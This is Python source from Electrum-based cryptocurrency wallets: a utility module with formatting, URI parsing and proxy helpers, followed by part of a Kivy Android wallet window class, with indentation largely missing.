return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(filters: Union[str, bool]):
global verbosity
if type(filters) is bool: # backwards compat
verbosity = '*' if filters else ''
return
verbosity = filters
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
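# Example (illustrative, not part of the original module):
# constant_time_compare('secret', 'secret') is True and
# constant_time_compare('secret', 'Secret') is False; the comparison time does not
# leak where the two values first differ.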
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
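# Illustrative sketch, not part of the original module: any function or method can
# be wrapped with @profiler; each call then prints its name and wall-clock duration
# through print_error, e.g. "[profiler] _profiler_example 0.0001". The helper below
# is a hypothetical example only.
@profiler
def _profiler_example(n):
    """Hypothetical helper used only to demonstrate the decorator."""
    return sum(range(n))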
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_btcc.electrum_btcc'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-btcc'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def ensure_sparse_file(filename):
# On modern Linux, no need to do anything.
# On Windows, need to explicitly mark file.
if os.name == "nt":
try:
os.system('fsutil sparse setflag "{}" 1'.format(filename))
except Exception as e:
print_error('error marking file {} as sparse: {}'.format(filename, e))
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    Cast a string to a bytes-like object; bytearray input is copied to bytes (kept for Python 2 compatibility).
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
    '01020a'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-btcc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-BTCC")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-BTCC")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Bchain.info': ('https://bchain.info/',
{'tx': 'BTCC/tx/', 'addr': 'BTCC/addr/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btcc/',
{'tx': 'tx/', 'addr': 'address/'}),
'explorer.bitcored.net': ('http://explorer.bitcored.net/',
{'tx': 'tx/', 'addr': 'address/'}),
'LiteCore': ('https://insight.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/BTCC/', 'addr': 'address/BTCC/'}),
'system default': ('blockchain://12a765e31ffd4059bada1e25190f6e98c99d9714d334efa41a195a7e7e04bfe2/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'LiteCore': ('https://testnet.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/BTCCTEST/', 'addr': 'address/BTCCTEST/'}),
'system default': ('blockchain://4966625a4b2851d9fdee139e56211a0d88575f59ed816ff5e6a63deb4e3e29a0/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'LiteCore')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Bitcored address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcored':
raise Exception("Not a bitcored URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Bitcored address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcored', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
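# Illustrative sketch, not part of the original module: setup_thread_excepthook()
# must be called once from the main thread before any threads are created; after
# that, uncaught exceptions in worker threads are routed to sys.excepthook instead
# of threading's default handler. The worker below is a hypothetical example and
# only runs when this file is executed directly.
if __name__ == '__main__':
    setup_thread_excepthook()

    def _failing_worker():
        # hypothetical worker used only to demonstrate the hook
        raise RuntimeError("uncaught exception from a worker thread")

    t = threading.Thread(target=_failing_worker)
    t.start()
    t.join()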
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
class AIOSafeSilentException(Exception): pass
def aiosafe(f):
# save exception in object.
# f must be a method of a PrintError instance.
# aiosafe calls should not be nested
async def f2(*args, **kwargs):
self = args[0]
try:
return await f(*args, **kwargs)
except AIOSafeSilentException as e:
self.exception = e
except asyncio.CancelledError as e:
self.exception = e
except BaseException as e:
self.exception = e
self.print_error("Exception in", f.__name__, ":", e.__class__.__name__, str(e))
try:
traceback.print_exc(file=sys.stderr)
except BaseException as e2:
self.print_error("aiosafe:traceback.print_exc raised: {}... original exc: {}".format(e2, e))
return f2
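# Illustrative sketch, not part of the original module: aiosafe is intended to wrap
# async methods of PrintError subclasses. Instead of letting an exception escape
# and kill the task, the wrapper stores it on self.exception and logs it via
# self.print_error. The class below is a hypothetical example only.
class _AiosafeExample(PrintError):
    def __init__(self):
        self.exception = None

    @aiosafe
    async def fetch(self):
        # any exception raised here is recorded on self.exception instead of propagating
        raise ValueError("simulated network failure")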
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
def make_aiohttp_session(proxy):
if proxy:
connector = SocksConnector(
socks_ver=SocksVer.SOCKS5 if proxy['mode'] == 'socks5' else SocksVer.SOCKS4,
host=proxy['host'],
port=int(proxy['port']),
username=proxy.get('user', None),
password=proxy.get('password', None),
rdns=True
)
return aiohttp.ClientSession(headers={'User-Agent' : 'Electrum'}, timeout=aiohttp.ClientTimeout(total=10), connector=connector)
else:
return aiohttp.ClientSession(headers={'User-Agent' : 'Electrum'}, timeout=aiohttp.ClientTimeout(total=10))
class SilentTaskGroup(TaskGroup):
def spawn(self, *args, **kwargs):
# don't complain if group is already closed.
if self._closed:
raise asyncio.CancelledError()
return super().spawn(*args, **kwargs)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_zaap
from electrum_zaap.bitcoin import TYPE_ADDRESS
from electrum_zaap import WalletStorage, Wallet
from electrum_zaap_gui.kivy.i18n import _
from electrum_zaap.paymentrequest import InvoiceStore
from electrum_zaap.util import profiler, InvalidPassword
from electrum_zaap.plugins import run_hook
from electrum_zaap.util import format_satoshis, format_satoshis_plain
from electrum_zaap.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
# lazy imports for factory so that widgets can be used in kv
Factory.register('InstallWizard',
module='electrum_zaap_gui.kivy.uix.dialogs.installwizard')
Factory.register('InfoBubble', module='electrum_zaap_gui.kivy.uix.dialogs')
Factory.register('OutputList', module='electrum_zaap_gui.kivy.uix.dialogs')
Factory.register('OutputItem', module='electrum_zaap_gui.kivy.uix.dialogs')
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register the widget cache to keep memory use down; the timeout is set so the
# data stays cached.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_zaap_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_zaap.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_zaap.network import DEFAULT_PORTS
pp = servers.get(host, DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'zaap':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mzaap')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Screen orientation of the app.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
super(ElectrumWindow, self).__init__(**kwargs)
title = _('Electrum-zaap App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_zaap.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('zaap:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_zaap.transaction import Transaction
try:
            text = base_decode(data, None, base=43).hex()
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_zaap.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.open()
def qr_dialog(self, title, data, show_text=False):
from uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for zaap: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum-zaap: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
if self._settings_dialog is None:
